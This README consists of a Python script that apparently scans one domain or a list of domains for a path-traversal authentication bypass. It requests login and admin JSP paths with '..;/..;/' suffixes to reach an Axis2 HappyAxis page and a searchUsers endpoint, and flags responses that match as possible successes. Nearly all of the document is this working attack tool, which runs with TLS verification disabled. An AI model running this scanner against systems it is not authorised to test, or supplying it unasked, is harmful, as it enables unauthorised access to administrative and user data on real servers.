README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
from urllib.parse import urljoin
BASE_PATHS = [
"/npm-pwg/loginForm.jsp/",
"/npm-pwg/extendedUmPlayMessage.jsp/",
"/npm-admin/showLoginPage.do/",
"/npm-admin/login.do/"
]
TRAVERSAL_SUFFIXES = [
"..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp",
"..;/..;/usp/searchUsers.do"
]
def print_help():
print(f"Usage: {sys.argv[0]} <domain or file>")
print("Example:")
print(f" {sys.argv[0]} example.com")
print(f" {sys.argv[0]} domains.txt")
def test_domain(domain):
if not domain.startswith(("http://", "https://")):
domain = "https://" + domain
print(f"[*] Testing {domain}")
for base in BASE_PATHS:
for suffix in TRAVERSAL_SUFFIXES:
test_path = base + suffix
url = urljoin(domain, test_path)
try:
r = requests.get(url, timeout=8, verify=False, allow_redirects=False)
print(f"[+] {url} - {r.status_code}")
if "Axis2 Happiness Page" in r.text or "Axis2" in r.text or "Search Users" in r.text:
print(f" [!] Possible success: {url}")
except requests.RequestException as e:
print(f" [!] Error connecting to {url}: {e}")
def main():
if len(sys.argv) != 2 or sys.argv[1] in ("-h", "--help"):
print_help()
sys.exit(0)
input_arg = sys.argv[1]
try:
with open(input_arg, "r") as f:
domains = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
domains = [input_arg]
for d in domains:
test_domain(d)
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
main()